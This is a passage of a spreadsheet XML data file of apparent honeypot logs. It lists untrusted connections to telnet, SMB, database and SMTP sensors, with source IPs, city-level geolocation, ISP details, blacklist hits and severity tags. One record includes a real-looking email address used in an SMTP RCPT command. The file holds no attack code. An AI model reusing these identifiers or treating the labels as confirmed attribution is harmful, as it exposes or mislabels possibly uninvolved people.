    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e88:b59b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1920"/>
    <x v="1920"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T02:13:24"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-14T02:13:24"/>
    <n v="7942"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H26&amp;&amp;SMA-LAB_DNS_H34&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_SMTP_H4&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H30&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMTP_H7&amp;&amp;SMA-LAB_SMTP_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;53&amp;&amp;38348&amp;&amp;43298&amp;&amp;54376&amp;&amp;40330&amp;&amp;35917&amp;&amp;24244&amp;&amp;33971&amp;&amp;25242&amp;&amp;10076&amp;&amp;64376&amp;&amp;23948&amp;&amp;11572&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LT"/>
    <s v="Lithuania"/>
    <s v="VL"/>
    <s v="Vilnius"/>
    <s v="Vilnius City Municipality"/>
    <s v="Vilnius"/>
    <s v="593116"/>
    <s v="09311"/>
    <s v="54.6916"/>
    <s v="25.2874"/>
    <s v="133398"/>
    <s v="Tele Asia Limited"/>
    <s v="HostBaltic"/>
    <s v="hosting"/>
    <s v="UAB Host Baltic"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;michaelchika1@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d7d:4219"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1921"/>
    <x v="1921"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T02:12:19"/>
    <d v="2024-04-23T06:19:34"/>
    <d v="2025-04-14T02:12:19"/>
    <n v="72"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;445&amp;&amp;17124&amp;&amp;43307&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Malviya Nagar)"/>
    <s v="1261481"/>
    <s v="110017"/>
    <s v="28.531"/>
    <s v="77.2141"/>
    <s v="136696"/>
    <s v="Arktel Networks Pvt. Ltd"/>
    <s v="Sifi Online Pvt Ltd"/>
    <s v="business"/>
    <s v="Sifi Online Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6767:3879"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1922"/>
    <x v="1922"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T02:05:19"/>
    <d v="2025-04-11T08:37:24"/>
    <d v="2025-04-14T02:05:19"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="119"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="TZ"/>
    <s v="Tanzania"/>
    <s v="02"/>
    <s v="Dar es Salaam Region"/>
    <s v="Ilala District"/>
    <s v="Dar es Salaam"/>
    <s v="160263"/>
    <s v="NA"/>
    <s v="-6.8185"/>
    <s v="39.2863"/>
    <s v="33765"/>
    <s v="TANZANIA TELECOMMUNICATIONS CO. LTD"/>
    <s v="TTCL"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-04-13"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:293b:1d23"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1923"/>
    <x v="1923"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T01:52:52"/>
    <d v="2025-04-14T01:52:52"/>
    <d v="2025-04-14T01:52:52"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5e:382f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1924"/>
    <x v="1924"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T01:39:05"/>
    <d v="2025-04-14T01:39:05"/>
    <d v="2025-04-14T01:39:05"/>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7:c01b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1925"/>
    <x v="1925"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T01:36:59"/>
    <d v="2025-04-14T01:36:59"/>
    <d v="2025-04-14T01:36:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="TZ"/>
    <s v="Tanzania"/>
    <s v="02"/>
    <s v="Dar es Salaam Region"/>
    <s v="Ilala District"/>
    <s v="Dar es Salaam"/>
    <s v="160263"/>
    <s v="NA"/>
    <s v="-6.81899"/>
    <s v="39.2867"/>
    <s v="33765"/>
    <s v="TTCLDATA"/>
    <s v="Tanzania Telecommunications CO. LTD"/>
    <s v="corporate"/>
    <s v="Ttcl"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:293b:9148"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1926"/>
    <x v="1926"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T01:30:09"/>
    <d v="2025-04-14T01:09:19"/>
    <d v="2025-04-14T01:30:09"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:1c92"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1927"/>
    <x v="1927"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T01:07:34"/>
    <d v="2025-04-07T22:51:31"/>
    <d v="2025-04-14T01:07:34"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13696"/>
    <s v="101.694"/>
    <s v="4788"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="residential"/>
    <s v="Adsl Streamyx"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3c30:1ac3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1928"/>
    <x v="1928"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T01:05:59"/>
    <d v="2025-04-14T01:05:59"/>
    <d v="2025-04-14T01:05:59"/>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d8:1131"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1929"/>
    <x v="1929"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T01:05:39"/>
    <d v="2024-07-11T22:33:00"/>
    <d v="2025-04-14T01:05:39"/>
    <n v="37"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H2"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;22"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="NA"/>
    <s v="Namibia"/>
    <s v="KH"/>
    <s v="Khomas Region"/>
    <s v="NA"/>
    <s v="Windhoek (Prosperita Industrial)"/>
    <s v="3352136"/>
    <s v="NA"/>
    <s v="-22.6208"/>
    <s v="17.0804"/>
    <s v="33763"/>
    <s v="Paratus Telecommunications Limited"/>
    <s v="Paratus Regional - Angola"/>
    <s v="business"/>
    <s v="Internet Technologies Namibia"/>
    <s v="2013-06-11"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (197.234.121.192,58689)}&amp;&amp;{Data_SMB:Incoming connection (197.234.121.192,59374)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c5ea:79c0"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1930"/>
    <x v="1930"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T00:29:16"/>
    <d v="2025-04-11T21:39:09"/>
    <d v="2025-04-14T00:29:16"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H22"/>
    <s v="23&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (59.92.196.56,53721)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:c438"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1931"/>
    <x v="1931"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T00:18:21"/>
    <d v="2025-04-10T13:28:49"/>
    <d v="2025-04-14T00:18:21"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b63:622e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1932"/>
    <x v="1932"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T00:13:35"/>
    <d v="2025-04-14T00:05:42"/>
    <d v="2025-04-14T00:13:35"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Ghaziabad"/>
    <s v="Ghaziabad"/>
    <s v="1271308"/>
    <s v="201009"/>
    <s v="28.6692"/>
    <s v="77.4538"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:5710"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1933"/>
    <x v="1933"/>
    <s v="NA&amp;&amp;pool-99-254-42-30.cpe.net.cable.rogers.com"/>
    <x v="0"/>
    <d v="2025-04-14T00:11:19"/>
    <d v="2025-04-04T15:13:55"/>
    <d v="2025-04-14T00:11:19"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="ON"/>
    <s v="Ontario"/>
    <s v="York"/>
    <s v="Newmarket"/>
    <s v="6087701"/>
    <s v="L3Y"/>
    <s v="44.0592"/>
    <s v="-79.4613"/>
    <s v="812"/>
    <s v="Rogers Communications Canada Inc."/>
    <s v="Rogers Communications Canada Inc."/>
    <s v="residential"/>
    <s v="Rogers Cable Inc. ETOB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:63fe:2a1e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1934"/>
    <x v="1934"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T23:48:04"/>
    <d v="2025-04-12T06:46:16"/>
    <d v="2025-04-13T23:48:04"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur"/>
    <s v="1735161"/>
    <s v="59100"/>
    <s v="3.11613"/>
    <s v="101.666"/>
    <s v="4788"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="business"/>
    <s v="Unifi BIZ"/>
    <s v="2011-04-05"/>
    <s v="UNIFI-BIZ"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:120:2a36"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1935"/>
    <x v="1935"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T23:34:15"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-13T23:34:15"/>
    <n v="172"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H23&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;57323&amp;&amp;1433&amp;&amp;445&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IQ"/>
    <s v="Iraq"/>
    <s v="BA"/>
    <s v="Basra"/>
    <s v="Al-Midaina District"/>
    <s v="Al Madīnah"/>
    <s v="99106"/>
    <s v="NA"/>
    <s v="30.9632"/>
    <s v="47.27"/>
    <s v="203214"/>
    <s v="Hulum Almustakbal Company for Communication Engineering and Services Ltd"/>
    <s v="Hulum Almustakbal Company for Communication Engineering and Services Ltd"/>
    <s v="residential"/>
    <s v="Broadbandsubscriberpool"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,61616)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,62315)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,56528)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,61919)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,50332)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,50854)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,60244)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,61658)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,65183)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,49395)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,49217)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,49782)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,65027)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,50107)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,60282)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,51523)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,62100)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,50706)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:95ff:f69e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1936"/>
    <x v="1936"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T23:24:36"/>
    <d v="2025-04-13T23:24:36"/>
    <d v="2025-04-13T23:24:36"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
